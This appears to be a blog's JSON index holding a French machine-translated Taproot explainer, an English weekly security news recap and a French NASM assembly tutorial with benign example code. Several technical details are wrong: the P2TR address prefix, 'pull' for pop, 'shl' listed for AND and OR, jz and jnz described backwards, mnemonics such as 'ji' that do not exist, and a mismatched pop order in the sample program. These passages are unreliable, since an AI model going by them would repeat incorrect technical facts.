lorsque 90% des blocs minés ont signalé leur soutien à la mise à jour sur une période de deux semaines (pour être plus précis, l\u0026rsquo;exigence était d\u0026rsquo;avoir 1 815 des 2 016 blocs soutenant la mise à jour).\nTaproot comprend trois propositions d\u0026rsquo;amélioration de Bitcoin (BIP340, BIP341 et BIP342) incluant les signatures Schnorr, MAST et Tapscript. Dans cet article, nous les passerons tous en revue et verrons comment ils fonctionnent et ce qu\u0026rsquo;ils apportent à Bitcoin. Notez que les changements permettent la rétrocompatibilité (ce qui signifie que vous pourrez toujours utiliser les anciens types d\u0026rsquo;adresses).\nSignatures Schnorr # Jusqu\u0026rsquo;à présent, Bitcoin utilisait des signatures ECDSA (courbes secp256k1) avec des hachages SHA256 pour authentifier les transactions. Le BIP 340 introduit une nouvelle façon de faire des signatures en utilisant Schnorr. Le nouveau mécanisme utilise aussi la cryptographie à courbe elliptique, mais son principal avantage est le support natif du multisig.\nDans la configuration actuelle, une transaction provenant d\u0026rsquo;une adresse multisig aura plusieurs signatures attachées. Cependant, puisque Schnorr est linéaire, il permet d\u0026rsquo;agréger plusieurs signatures en une seule (« agrégation de clés »). Cela offre les avantages suivants :\nLes transactions multisig auront toujours une seule signature de la même taille, quel que soit le nombre de participants, ce qui offre des améliorations de performance (une seule signature à vérifier au lieu de plusieurs, et Schnorr est plus rapide qu\u0026rsquo;ECDSA). Cela offre aussi un gain de capacité réseau puisque leur taille sera plus petite. Avec Schnorr, il n\u0026rsquo;est pas possible de savoir si une adresse est multisig ou non, et combien de participants y ont pris part, tant que tout le monde signe les transactions Voyons plus en détail comment les choses se dérouleraient en conditions réelles avec une adresse P2SH 3/3 historique. La partie gauche du schéma montre le processus de création de l\u0026rsquo;adresse et la partie droite montre comment dépenser les fonds envoyés à cette adresse.\nL\u0026rsquo;ancienne façon de créer une adresse multisig 3/3 et de dépenser les fonds Le schéma précédent ne devrait pas être une surprise si vous êtes familier avec Bitcoin ; nous observons que lorsque les fonds sont dépensés, il est possible de voir que le script nécessitait les signatures A, B et C (les trois clés attendues seraient révélées même si l\u0026rsquo;adresse était un multisig 2/3).\nMaintenant, regardons comment les choses fonctionneraient avec les adresses Taproot. Comme précédemment, la partie gauche du schéma montre la création de l\u0026rsquo;adresse, et la partie droite comment dépenser les fonds avec.\nCréation d\u0026rsquo;une adresse multisig 3/3 et dépense des fonds Dans ce cas, la seule chose qui sera présente sur la blockchain est la signature agrégée correspondant à la clé publique générée lors de la première étape. Par conséquent, il ne sera pas possible de savoir en regardant la transaction que les fonds étaient stockés dans une adresse multisig. Dans le cas où l\u0026rsquo;adresse permettrait 2/3 signatures, les choses seraient aussi légèrement différentes et nous en discuterons plus en détail plus tard.\nBranche de Merkle # Le BIP 341 introduit MAST (Merkelized Abstract Syntax Tree) comme moyen de faire des transactions de paiement par script. Auparavant, le script complet devait être partagé pour pouvoir dépenser les fonds envoyés à une adresse P2SH. Avec la nouvelle approche, seule la partie du script qui est effectivement utilisée est rendue publique. Cela a deux avantages : cela nécessite moins d\u0026rsquo;espace sur la blockchain et cela améliore la confidentialité des entités participant aux transactions. Regardons le schéma suivant comme exemple. Il montre un script impliquant quatre clés publiques (1, 2, 3 et 4) qui permet d\u0026rsquo;envoyer de l\u0026rsquo;argent soit avec deux signatures des clés 1, 2 ou 3, soit avec une seule signature de la clé 4 si le bloc actuel est supérieur à x.\nExemple de script MAST Supposons que nous voulions envoyer des fonds en utilisant les clés 1 et 2. Dans ce cas, nous signerons la transaction avec les clés privées 1 et 2, puis nous révélerons le script 1 et les éléments en vert. Ce faisant, les conditions pour le script 1 sont remplies, et le hash racine (qui a été utilisé lors de la création de l\u0026rsquo;adresse) peut être recalculé, prouvant ainsi que le script 1 est autorisé à être utilisé pour dépenser les fonds.\nP2TR (Pay-To-Taproot) # Afin de supporter les changements précédents, le BIP341 introduit les règles de dépense SegWit version 1 (le SegWit de 2017 était la version 0) ainsi que le nouveau type d\u0026rsquo;adresse Pay-To-Taproot (P2TR). Ces adresses commenceront par bc1q au lieu de bc1q.\nL\u0026rsquo;un des avantages de P2TR est qu\u0026rsquo;il peut être utilisé pour payer à un script ou à une clé publique, et il ne sera pas possible de dire lequel des deux est une adresse tant que les fonds n\u0026rsquo;ont pas été dépensés. En fait, même après cela, il peut ne pas être possible de savoir s\u0026rsquo;il y avait un script car il existe une option qui permet à toutes les parties impliquées dans un smart contract de signer une transaction plutôt que de suivre les règles du script.\nTapscript # Tapscript - activé par le BIP342 - est la dernière partie de la mise à jour Taproot et inclut des améliorations de la structure des scripts pour s\u0026rsquo;adapter aux autres changements. Entre autres choses, le BIP342 fait ce qui suit :\nModifier OP_CHECKSIG et OP_CHECKSIGVERIFY pour être utilisables avec les signatures Schnorr OP_CHECKMULTISIG et OP_CHECKMULTISIGVERIFY sont désactivés et remplacés par OP_CHECKSIGADD La taille maximale de script de 10 000 octets ne s\u0026rsquo;applique plus, et la taille est simplement limitée par la limite de poids du bloc De plus, pour faciliter les futures améliorations des scripts, Tapscript inclut de nouveaux opcodes (instructions de transaction) qui peuvent être utilisés pour ajouter des fonctionnalités. Les codes sont numérotés 80, 98, 126-129, 131-134, 137-138, 141-142, 149-153, 187-254, et si l\u0026rsquo;un d\u0026rsquo;entre eux est rencontré pour le moment, la validation réussira et ignorera les autres règles. Les opcodes sont nommés OP_SUCCESSx (par exemple, OP_SUCCESS80, OP_SUCCESS98, \u0026hellip;, OP_SUCCESS254)\nSupport P2TR # Bitcoin.it a une liste des principaux portefeuilles et services Bitcoin et les types d\u0026rsquo;adresses vers lesquels ils peuvent recevoir des fonds. Jusqu\u0026rsquo;à présent, il semble que la plupart d\u0026rsquo;entre eux n\u0026rsquo;aient pas partagé de plan daté pour implémenter les adresses P2TR. Notamment, Trezor prévoyait de l\u0026rsquo;implémenter d\u0026rsquo;ici décembre de cette année.\nSources # BIP 0340 (Bitcoin GitHub) BIP 0341 (Bitcoin GitHub) BIP 0342 (Bitcoin GitHub) Technology roadmap - Schnorr signatures and signature aggregation (Bitcoin Core) [bitcoin-dev] Taproot: Privacy preserving switchable scripting (Bitcoin Mailing List) MAST, Taproot, Graftroot (MIT OpenSourceWare - Youtube) Create Raw Multi-Sig P2SH Bitcoin Transaction in Golang (Mahdi Darabi) Locked In: Bitcoin\u0026rsquo;s Taproot Upgrade Gets Its 90% Mandate (CoinDesk) Crédits # Photo de couverture par Executium sur Unsplash ","date":"2021-11-17","externalUrl":null,"permalink":"/fr/posts/2021/taproot-soft-fork-what-does-it-bring-to-bitcoin/","section":"Articles","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\nLe soft fork Taproot a finalement été activé le dimanche 14 avec le bloc 709 634. Il s’agit de la première mise à jour majeure de Bitcoin depuis SegWit en 2017. Son implémentation a été décidée en juin de cette année (au bloc 687 284) lorsque 90% des blocs minés ont signalé leur soutien à la mise à jour sur une période de deux semaines (pour être plus précis, l’exigence était d’avoir 1 815 des 2 016 blocs soutenant la mise à jour).\n","title":"Soft-Fork Taproot : qu'apporte-t-il à Bitcoin ?","type":"posts"},{"content":"This week, multiple arrests occurred in relation to the REvil ransomware, Tor finally totally depreciated v2 services, and North Korea-related APT are trying to hack researchers again. Read our weekly news recap to find out more.\nYou probably heard about the Assembly language, which is among other things used to do reverse engineering. If you\u0026rsquo;re curious to learn the basics, or just to see what it looks like, you can take a look at our latest article.\nAPT # China says a foreign spy agency hacked its airlines, stole passenger records (The Record)\nThe Chinese authorities announced that a foreign intelligence agency hacked multiple Chinese airlines in 2020 to steal passengers travel records. They did not name any company or agency.\nState hackers breach defense, energy, healthcare orgs worldwide (Bleeping Computer)\nThe cybersecurity firm Palo Alto Networks warned of an attack targeting vulnerable Zoho\u0026rsquo;s enterprise password management installations that might be carried out by the China-related APT27. Over 11,000 servers were found to be vulnerable, and the attackers might have targeted more than 370 in the US alone.\nNorth Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets (Cisco - Talos)\nCisco Talos observed a malware campaign carried on by Kimsuky, a North Korea-related APT. The group uses malicious Blogspot blogs to deliver malware and targets South Korea think tanks focused on military, political and diplomatic topics related to North Korea, Russian, China, and the US.\nLazarus hackers target researchers with trojanized IDA Pro (Bleeping Computer)\nThe North Korean related Lazarus APT was found to be distributing a pirated version of the IDA Pro reverse engineering software containing a trojan. Earlier this year, the same group created social media accounts and pretended to be security researchers to try to hack actual ones.\nmacOS zero-day deployed via Hong Kong pro-democracy news sites (The Record)\nThe Google Threat Analysis Group discovered a watering hole attack campaign using Hong Kong pro-democracy websites and going on since at least August this year. The attack was using 0day flaws to target iOS and macOS systems. Google did not manage to attribute the attack but assessed that it was likely be state-backed.\nCryptocurrencies # The FBI Warns of Fraudulent Schemes Leveraging Cryptocurrency ATMs and QR Codes to Facilitate Payment (IC3)\nThe FBI warned of increased usage of scams leveraging cryptocurrencies ATMs and QR codes to facilitate payments. Scammers would often give a QR code associated with their cryptocurrencies wallet, and ask victims to deposit some cash.\nBitcoin soft fork days away as Taproot upgrade closes in (Cointelegraph)\nTaproot, the first major Bitcoin update since 2017 is set to be activated in a soft fork this week. It will require 90% of the miners on board, and introduce Merkelized Abstract Syntax Tree and Schnorr Signatures. The activation process can be followed here.\nTreasury Continues to Counter Ransomware as Part of Whole-of-Government Effort; Sanctions Ransomware Operators and Virtual Currency Exchange (US Departement of Treasury)\nThe US Treasury sanctioned Chatex, a cryptocurrencies exchange, for facilitating financial transactions for ransomware actors. The authorities also said that more than half of the exchange\u0026rsquo;s activity was directly linked to illegal activities such as darknet markets. IZIBITS OU, Chatextech SIA, and Hightrade Finance Ltd were also punished by OFAC sanctions for the material support they provided to Chatex.\nDarknet # Wallstreet Vendor “RaptureReloaded” Sentenced to Prison (Darknetlive)\nA Wall Street market vendor was sentenced to 96 months in prison for selling various drugs. She was caught after paying for drug packages with her credit card and using her real phone number and email address to register various accounts.\nNew Release: Tor Browser 11.0 (Tor Blog)\nTor Browser 11 was released on Monday, and includes the final depreciation of Onion Services v2\nGeneral Security # Microsoft Patch Tuesday security updates for November 2021 fix 2 Zero-Days actively exploited (Security Affairs)\nMicrosoft released a security update addressing 55 vulnerabilities. 2 of them related to Exchange (2016 and 2019) and Excel are actively exploited.\nSunsetting Chrome sync for Chrome M48 and older (Google)\nGoogle announced that Chome sync will be disabled from Chrome browsers using version M48 or lower.\n\u0026lsquo;Trojan Source\u0026rsquo; Bug Threatens the Security of All Code (Krebs on Security)\nResearchers at the University of Cambridge discovered a bug that could allow attackers to sneak vulnerabilities into a source code just by adding Bidi override characters (a feature of Unicode to manage scripts with different writing directions) into strings or comments.\nPrivacy # Robinhood Announces Data Security Incident (Robinhood)\nRobinhood (a trading platform) was hacked after a support employee got social-engineered. According to the company, the unauthorized party is believed to have gained access to five million users\u0026rsquo; email addresses and full names. More personal details of about 310 users were also accessed.\nGoogle scores big win as court blocks iPhone tracking lawsuit (We Live Security)\nThe UK\u0026rsquo;s Supreme Court dismissed a mass action lawsuit where Google was accused of tracking iPhone users without their knowledge or consent for commercial purposes. The court ruled that a damages compensation couldn\u0026rsquo;t be awarded without proof that the affected users suffered material damage or mental distress.\nPhilippines gov takes down passport application website amid privacy leak fears (The Register)\nThe Philippines\u0026rsquo; Department of Foreign Affairs disabled its online passport application tracker over data privacy issues concerns. It said that some information might have been exposed and that an internal audit is in progress.\nRansomware # Five affiliates to Sodinokibi/REvil unplugged (Europol)\nEuropol announced that Romanian and Kuwaiti law enforcement agencies caught two suspected believed to be Sodinobiki/REvil affiliates, and one believed to be affiliated to GrandGrab. In total, they are suspected of being involved in 7,000 attacks, asking more than EUR 200 million in ransoms.\nREvil Ransom Arrest, $6M Seizure, and $10M Reward (Krebs on Security)\nA Russian national was indicted in the US after being arrested in Poland in October for being involved with REvil. The DOJ also seized USD 6.1 million in cryptocurrencies.\nInteresting Reads # Who Controls the Internet? And should they? (berthub.eu) Void Balaur - Tracking a Cybernercenary\u0026rsquo;s Activities (Trend Micro) THREAT ANALYSIS REPORT: From Shatak Emails to the Conti Ransomware (Cyber Reason) European Union serious and organised crime threat assessment (Europol) ","date":"2021-11-12","externalUrl":null,"permalink":"/blog/weekly-news-recap-14/","section":"News","summary":"This week, multiple arrests occurred in relation to the REvil ransomware, Tor finally totally depreciated v2 services, and North Korea-related APT are trying to hack researchers again. Read our weekly news recap to find out more.\n","title":"Weekly News Recap 14","type":"news"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nLe langage assembleur (ASM) est le langage de programmation de plus bas niveau que l\u0026rsquo;on puisse trouver. Il est très proche des instructions du processeur et, par conséquent, il existe une multitude de langages assembleurs, chacun conçu pour une architecture informatique spécifique. L\u0026rsquo;ASM est utilisé dans diverses situations, comme pour les programmes sensibles aux performances, le code de démarrage des systèmes ou la rétro-ingénierie de programmes.\nDans l\u0026rsquo;article d\u0026rsquo;aujourd\u0026rsquo;hui, nous étudierons NASM (« Netwide Assembler »), qui est un langage ASM pour l\u0026rsquo;architecture Intel x86. Il peut être utilisé pour écrire des programmes 16 bits, 32 bits et 64 bits et est considéré comme l\u0026rsquo;un des assembleurs les plus populaires pour Linux (bien qu\u0026rsquo;il puisse aussi être utilisé avec Mac et Windows).\nCet article passera en revue la plupart des choses que vous devez savoir pour pouvoir commencer à coder en NASM ou pour comprendre le code NASM si vous souhaitez faire de la rétro-ingénierie de programmes. Bien que certaines choses changent selon le système d\u0026rsquo;exploitation pour lequel vous codez, les concepts généraux restent les mêmes, donc ce tutoriel peut quand même vous être utile, même si vous ne prévoyez pas d\u0026rsquo;utiliser Linux.\nComme vous pouvez l\u0026rsquo;imaginer, l\u0026rsquo;assembleur est un sujet assez long et complexe, il n\u0026rsquo;est donc pas possible de couvrir 100% des choses. Si vous voulez en savoir plus sur NASM, vous pouvez vous référer à cette documentation.\nStructure d\u0026rsquo;un programme NASM # Tout d\u0026rsquo;abord, étudions un morceau de code écrit en NASM. L\u0026rsquo;extrait ci-dessous présente un code « Hello World » et sera utilisé pour introduire certains concepts principaux et comment le code NASM est structuré. Certaines des notions seront discutées plus en profondeur dans les parties suivantes.\nglobal _start section .text _start: mov rax, 1\t; Set the function to call (1 is write) mov rdi, 1\t; Set the first argument of write (fd 1) mov rsi, msg\t; Set the 2nd argument, the text to write mov rdx, msg.len\t; Set the 3rd argument, lengh to write syscall\t; Call write w/ previously defined things mov rax, 60\t; Set the function (syscall) exit (id 60) xor rdi, rdi\t; Set the exit return to be 0 syscall\t; Execute the syscall exit section .data msg: db\t\u0026#34;Hello, world!\u0026#34;,10\t; Assign \u0026#34;Hello, world!\\n\u0026#34; to the var msg .len: equ $ - msg\t; Assign len(msg) to msg.len Premièrement, nous pouvons observer que le code est divisé en sections. Il n\u0026rsquo;y en a que deux dans notre exemple (.text et .data), mais il y en a quelques autres que vous pouvez utiliser (notez que cela changera selon le système d\u0026rsquo;exploitation cible : par exemple, Windows utiliserait .code au lieu de .text).\n.text est la section où vous écrirez votre code ASM. rax, rdi, rsi et rdx sont appelés registres, et mov, syscall et xor sont des instructions. Nous les verrons dans la partie suivante .data vous permet d\u0026rsquo;allouer statiquement des objets globaux et statiques initialisés pour la durée de l\u0026rsquo;exécution du programme .bss vous permet de réserver de l\u0026rsquo;espace pour des objets globaux et statiques non initialisés .rodata est identique à .data avec la différence que les variables déclarées ici seront en lecture seule (c\u0026rsquo;est-à-dire constantes) Les éléments suivants qui ressortent sont _start et msg. Ce sont ce qu\u0026rsquo;on appelle des étiquettes (labels). _start est l\u0026rsquo;équivalent de la fonction main dans un langage de plus haut niveau comme C ou C++. C\u0026rsquo;est là que le programme commencera son exécution. Alternativement, il est aussi possible d\u0026rsquo;utiliser des étiquettes pour définir des fonctions et comme points de saut (un peu comme goto en C - nous en reparlerons plus tard). Les étiquettes sont aussi utilisées pour définir des variables, comme msg dans notre exemple ; nous en verrons davantage plus tard également.\nUne chose que vous remarquerez sous msg est le .len. Une étiquette qui commence par un point est appelée étiquette locale et sera associée à la précédente étiquette non locale. Dans notre exemple, elle sera appelée msg.len.\nLe code est probablement assez explicite mais ; est utilisé pour mettre des commentaires : tout ce qui est placé après ne sera pas interprété.\nRegistres # Les registres sont des emplacements de stockage conservés à l\u0026rsquo;intérieur du processeur, ce qui les rend très rapides. Il y en a 17, et certains ont une attribution d\u0026rsquo;usage spécifique (par exemple passer des arguments à une fonction). Techniquement, tous peuvent être modifiés à volonté (sauf rip), même s\u0026rsquo;il existe des conventions indiquant comment cela devrait être fait.\n64 bits 32 bits 16 bits 8 bits Commentaire rax eax ax al Pour fournir le numéro d\u0026rsquo;appel système\nPour fournir la valeur de retour de la fonction\nRegistre sauvegardé par l\u0026rsquo;appelant rcx ecx cx cl 4ème paramètre de fonction\nRegistre sauvegardé par l\u0026rsquo;appelant rdx edx dx dl 3ème paramètre de fonction\nRegistre sauvegardé par l\u0026rsquo;appelant rbx ebx bx bl Registre sauvegardé par l\u0026rsquo;appelé rsi esi si sil 2ème paramètre de fonction\nRegistre sauvegardé par l\u0026rsquo;appelant\nPointeur source pour les instructions de chaîne rdi edi di dil 1er paramètre de fonction\nRegistre sauvegardé par l\u0026rsquo;appelant rsp esp sp spl Pointeur de pile (élément du sommet)\nRegistre sauvegardé par l\u0026rsquo;appelant rbp ebp bp bpl Pointeur de base de pile\nRegistre sauvegardé par l\u0026rsquo;appelé r8 r8d r8w r8b 5ème paramètre de fonction\nRegistre sauvegardé par l\u0026rsquo;appelant r9 r9d r9w r9b 6ème paramètre de fonction\nRegistre sauvegardé par l\u0026rsquo;appelant r10 r10d r10w r10b Registre sauvegardé par l\u0026rsquo;appelant r11 r11d r11w r11b Registre sauvegardé par l\u0026rsquo;appelant r12 r12d r12w r12b Registre sauvegardé par l\u0026rsquo;appelé r13 r13d r13w r13b Registre sauvegardé par l\u0026rsquo;appelé r14 r14d r14w r14b Registre sauvegardé par l\u0026rsquo;appelé r15 r15d r15w r15b Registre sauvegardé par l\u0026rsquo;appelé rip eip Prochaine instruction à exécuter (rip ne peut pas être accédé directement par le programmeur) Vous remarquerez qu\u0026rsquo;il n\u0026rsquo;y a que 6 registres pouvant être utilisés pour passer des paramètres à une fonction. Ils ne permettent de passer que des entiers ou des pointeurs. Pour passer des paramètres de plus de 64 bits, ou pour en passer plus de 6, ils doivent être poussés sur la pile, avec le premier argument au sommet.\nVous remarquerez aussi qu\u0026rsquo;il existe deux types de registres : « sauvegardés par l\u0026rsquo;appelé » et « sauvegardés par l\u0026rsquo;appelant ». Il s\u0026rsquo;agit en fait d\u0026rsquo;une convention plutôt que de quelque chose de strict, mais ce que cela signifie est que :\nLes registres sauvegardés par l\u0026rsquo;appelant (volatils) sont destinés à un usage général et à contenir des informations temporaires. Ils peuvent être réécrits par n\u0026rsquo;importe quelle sous-routine Les registres sauvegardés par l\u0026rsquo;appelé (non volatils) sont destinés à contenir des valeurs à longue durée de vie et doivent être préservés entre les appels. C\u0026rsquo;est-à-dire : une fonction est censée les sauvegarder dans la pile au début et les restaurer depuis celle-ci à la fin (si la fonction veut utiliser ces registres) Instructions # Le prochain concept important en NASM est celui des instructions, qui sont essentiellement des mots-clés nous permettant de dire à l\u0026rsquo;ordinateur quoi faire. Cette partie vise à lister les principales.\nDéplacement de données # Instruction Effet mov dest, src Copier la valeur de src dans dest Fonctions # Instruction Effet syscall Appeler une fonction\nVoir le code dans la première partie ou la partie « Exécuter du code ASM et structure de fichiers plus complexe » pour plus de détails sur son utilisation. Cette page liste le code et les arguments à utiliser pour les fonctions courantes int code Envoyer un signal d\u0026rsquo;interruption. Peut être une autre façon de faire syscall\nVoir l\u0026rsquo;exemple Linux sur Wikipedia. Les appels de fonctions pour Linux x32 sont définis dans sys/syscall.h call label Permettre d\u0026rsquo;appeler une étiquette définie (c\u0026rsquo;est-à-dire une fonction - pouvant provenir d\u0026rsquo;un autre fichier) push item Pousser un élément sur la pile pull item Extraire un élément de la pile vers un registre Opérations arithmétiques # Instruction Effet inc dest dest = dest + 1 dec dest dest = dest - 1 add dest, src dest = dest + src sub dest, src dest = dest - src shr dest, k dest = dest \u0026gt;\u0026gt; k shl dest, k dest = dest \u0026lt;\u0026lt; k xor dest, src dest = dest ^ src shl dest, src dest = dest \u0026amp; src shl dest, src dest = dest | src Sauts et conditions # Instruction Effet jmp location Sauter à l\u0026rsquo;emplacement (peut être un registre ou une étiquette) test reg, const Comparaison bit à bit d\u0026rsquo;un registre et d\u0026rsquo;une constante. jz ou jnz doit suivre jz label Sauter à l\u0026rsquo;étiquette si les bits n\u0026rsquo;étaient pas égaux à 0 jnz label Sauter à l\u0026rsquo;étiquette si les bits étaient égaux à 0 cmp x, y Comparer x et y. Doit être suivi de jn, jne, jg, jge, ji, ou jil je label Sauter à l\u0026rsquo;étiquette si x est égal à y jne label Sauter à l\u0026rsquo;étiquette si x est différent de y jg label Sauter à l\u0026rsquo;étiquette si x est supérieur à y ji label Sauter à l\u0026rsquo;étiquette si x est inférieur à y jge label Sauter à l\u0026rsquo;étiquette si x est supérieur ou égal à y jil label Sauter à l\u0026rsquo;étiquette si x est inférieur ou égal à y Pour plus d\u0026rsquo;exemples, vous pouvez consulter cette antisèche qui est très utile.\nTypes de données # Dans l\u0026rsquo;exemple au début de cet article, nous avions la ligne de code suivante : msg: db\t\u0026quot;Hello, world!,10\u0026quot;, et nous avons expliqué que c\u0026rsquo;était une variable msg recevant la valeur Hello, world!\\n. db ici est le type de variable. Contrairement à un langage de plus haut niveau où vous auriez int pour stocker des nombres, char pour stocker un seul caractère, \u0026hellip; les types en NASM servent simplement à indiquer combien d\u0026rsquo;espace vos données occuperont. Les types disponibles sont listés dans le tableau suivant.\nType de données Suffixe Assignation de données Taille (bits) Byte db resb 8 Word dw resw 16 Double word dd resd 32 Quad word dq resq 64 Ten bytes dt rest 80 Octo Word do reso 128 Y Word dy resy 256 Z Word dz resz 512 Dans notre exemple précédent, nous pouvons voir que nous utilisons un suffixe db, ce qui fonctionne car un caractère fait 8 bits.\nUne chose que nous n\u0026rsquo;avons pas vue auparavant est la colonne d\u0026rsquo;assignation de données. Cela est utilisé dans la section .bss pour pouvoir définir combien d\u0026rsquo;espace nous voulons réserver. Par exemple :\n.bss buffer: resb 64 ; reserve 64 bytes wordvar: resw 1 ; reserve a word realarray: resq 10 ; array of ten reals Notez qu\u0026rsquo;il existe plusieurs façons d\u0026rsquo;écrire des valeurs en NASM. Le code suivant montre les différentes manières qui peuvent être utilisées. Remarquez que lors de l\u0026rsquo;écriture en bases autres que 10, les valeurs auront un suffixe (par exemple h pour hexadécimal, b pour binaire, \u0026hellip;) ou un préfixe (par exemple 0x pour hexadécimal, 0o pour octal, \u0026hellip;). Voir la partie 3.4.1 de la documentation pour plus de détails.\ndb 0x55 ; just the byte 0x55 db 0x55,0x56,0x57 ; three bytes in succession db \u0026#39;a\u0026#39;,0x55 ; character constants are OK db \u0026#39;hello\u0026#39;,13,10,\u0026#39;$\u0026#39; ; so are string constants dw 0x1234 ; 0x34 0x12 dw \u0026#39;a\u0026#39; ; 0x61 0x00 (it is just a number) dw \u0026#39;ab\u0026#39; ; 0x61 0x62 (character constant) dw \u0026#39;abc\u0026#39; ; 0x61 0x62 0x63 0x00 (string) dd 0x12345678 ; 0x78 0x56 0x34 0x12 dd 1.234567e20 ; floating-point constant dq 0x123456789abcdef0 ; eight byte constant dq 1.234567e20 ; double-precision float dt 1.234567e20 ; extended-precision float mov ax,200 ; decimal mov ax,0200 ; still decimal mov ax,0200d ; explicitly decimal mov ax,0d200 ; also decimal mov ax,0c8h ; hex mov ax,$0c8 ; hex again: the 0 is required mov ax,0xc8 ; hex yet again mov ax,0hc8 ; still hex mov ax,310q ; octal mov ax,310o ; octal again mov ax,0o310 ; octal yet again mov ax,0q310 ; octal yet again mov ax,11001000b ; binary mov ax,1100_1000b ; same binary constant mov ax,1100_1000y ; same binary constant once more mov ax,0b1100_1000 ; same binary constant yet again mov ax,0y1100_1000 ; same binary constant yet again Un autre concept important en NASM est l\u0026rsquo;adresse effective : un opérande d\u0026rsquo;une instruction qui référence la mémoire. La syntaxe sera une expression contenue entre crochets. L\u0026rsquo;extrait de code suivant montre quelques exemples d\u0026rsquo;utilisation :\n; Accessing a variable msg ; The msg variable address byte[msg] ; The value of the first byte of the variable msg byte[msg + 1] ; The value of the second byte of the msg variable word[msg] ; The value of the first two bytes of the msg variable ; Various operations cmp BYTE [rdi], 0h ; Check if the first byte of rdi is 0h Une dernière chose que je souhaite aborder dans cette partie est la portion .len: equ $ - msg de notre premier exemple :\nequ est utilisé pour définir un symbole comme une valeur constante. Quand il est utilisé, ce sera toujours pour attribuer une étiquette. La définition est absolue et ne peut pas être modifiée ultérieurement Le $ est l\u0026rsquo;adresse de la position actuelle. Puisque nous avons défini msg juste avant, nous pouvons savoir que la longueur de msg sera la distance en octets obtenue par adresse actuelle - adresse de msg Exécuter du code ASM et structure de fichiers plus complexe # Pour terminer cet article, nous allons écrire un court programme en ASM. Il récupérera les arguments du programme, et affichera ceux-ci ainsi que leur taille. Pour les besoins de l\u0026rsquo;exemple, nous écrirons une fonction strlen dans un fichier différent du fichier main.\nglobal my_strlen:function\t; We declare the label as a global function section .text my_strlen:\t; This is the function we will call later xor rax, rax\t; We set the return value as 0 while: cmp BYTE[rdi], 0h\t; If this is the end of the string (\\0) je end\t; Then we jump to the label end inc rax\t; We increment the return value by one inc rdi\t; We continue to the next char in the string jmp while\t; We jump to the label while (start of the loop) end: ret\t; We reached the end of the string, return rax Si vous avez tout lu jusqu\u0026rsquo;ici, rien dans la fonction my_strlen ne devrait vous surprendre. Une chose qui n\u0026rsquo;avait pas été mentionnée auparavant est que vous devez déclarer votre étiquette comme une fonction globale si vous voulez pouvoir l\u0026rsquo;appeler depuis un autre fichier. Passons à la partie principale du programme.\nglobal main ; We use the extern keyword to be able to use the functions defined outside of the file extern printf extern my_strlen section .text main: mov r10, rdi\t; We save argv into r10 mov r11, 0\t; We initialize r11 to 0 and will use it as a loop counter loop: ; rsi is the address of the first argv ; We use counter * 8 to be able to get the address of argv[r11] mov r12, qword [rsi + r11 * 8] ; We call our my_strlen function and give argv[r11] as an argument ; It will return the result in rax mov rdi, r12 call my_strlen ; The prinf call will overwrite some registers, we save them in the stack push r10 push r11 push r12 push rsi ; We set the printf arguments, and call the function mov rdi, printf_format mov rsi, r11 mov rdx, r12 mov rcx, rax mov rax, 0 ; We need to set this to 0 or the program will segfault call printf ; Once we called printf, we restore the registers from the stack pop r10 pop r11 pop r12 pop rsi ; We increase our counter and check that r11 \u0026lt; argc. If so, we jump to the loop label inc r11 cmp r10, r11 jg loop ; We call exit(0) mov rax, 60 xor rdi, rdi syscall section .data ; The string we will pass to printf as required by the prototype ; Unless write in the first example, we won\u0026#39;t give printf the numbers of characters to write, so we need to string to end with \u0026#39;\\0\u0026#39; printf_format: db \u0026#34;The argument number %d (\u0026#39;%s\u0026#39;) is %d characters long.\u0026#34;,10,0 Nous pouvons ensuite compiler notre programme comme suit, et voir que la sortie est celle attendue.\nuser@vm1:/tmp/test$ nasm -f elf64 main.S \u0026amp;\u0026amp; nasm -f elf64 function.S user@vm1:/tmp/test$ gcc -o a.out -no-pie main.o function.o user@vm1:/tmp/test$ ./a.out 1234 123 12345 The argument number 0 (\u0026#39;./a.out\u0026#39;) is 7 characters long. The argument number 1 (\u0026#39;1234\u0026#39;) is 4 characters long. The argument number 2 (\u0026#39;123\u0026#39;) is 3 characters long. The argument number 3 (\u0026#39;12345\u0026#39;) is 5 characters long. Cette fois encore, vous ne devriez pas être trop surpris par le contenu du fichier, sauf pour une chose. Nous avons mentionné précédemment que les programmes NASM devraient commencer par _start, mais notre programme ici commence par main. La raison est que nous utilisons gcc pour l\u0026rsquo;édition de liens, et il génèrera le _start lui-même avant d\u0026rsquo;appeler la fonction main.\nSi nous voulions utiliser _start, nous aurions pu compiler avec ld. Le problème est que c\u0026rsquo;est moins pratique lors de l\u0026rsquo;utilisation de fonctions externes comme printf (voir ceci pour plus d\u0026rsquo;informations). Si nous voulions compiler notre premier exemple, ce serait cependant simple à faire avec ld :\nuser@vm1:/tmp/test$ nasm -f elf64 example.S user@vm1:/tmp/test$ ld -o a.out example.o Une dernière chose qui pourrait vous intriguer concernant la compilation est pourquoi nous utilisons -no-pie avec GCC. La raison est que sur Ubuntu, GCC génèrera des exécutables indépendants de la position (PIE), avec lesquels notre code actuel n\u0026rsquo;est pas compatible. L\u0026rsquo;argument -no-pie indique à GCC de ne pas générer un exécutable PIE, mais nous avons aussi la possibilité de faire call printf wrt ..plt dans le code, ce qui rendrait notre code indépendant de la position.\nRessources # Netwide Assembler (Wikipedia) x86 calling conventions (Wikipedia) x64 Cheat Sheet (Doeppner - brown.edu) Notes on x86-64 programming (filliatr - lri.fr) The Netwide Assembler: NASM (documentation NASM) NASM Intel x86 Assembly Language Cheat Sheet (Bencode.net) Intel® 64 and IA-32 Architectures Software Developer\u0026rsquo;s Manual (Intel) NASM Assembly Language Tutorials (asmtutor.com) NASM Tutorial (lmu.edu - ray) Linux System Call Table for x86_64 (blog.rchapman.org) NASM Manual - Local labels (tortall.net) Crédits # Photo de couverture par Markus Spiske sur Unsplash ","date":"2021-11-11","externalUrl":null,"permalink":"/fr/posts/2021/getting-started-with-nasm-assembly/","section":"Articles","summary":"Vous voulez utiliser le langage assembleur (NASM) mais ne savez pas par où commencer ? Nous parcourons toutes les bases avec de nombreux exemples pour vous permettre de démarrer rapidement","title":"Débuter avec l'assembleur NASM","type":"posts"},{"content":"As always, plenty of things happened this week, but no worries if you had no time to go through all the news. Our weekly news recap will keep you up to date on the latest APTs, 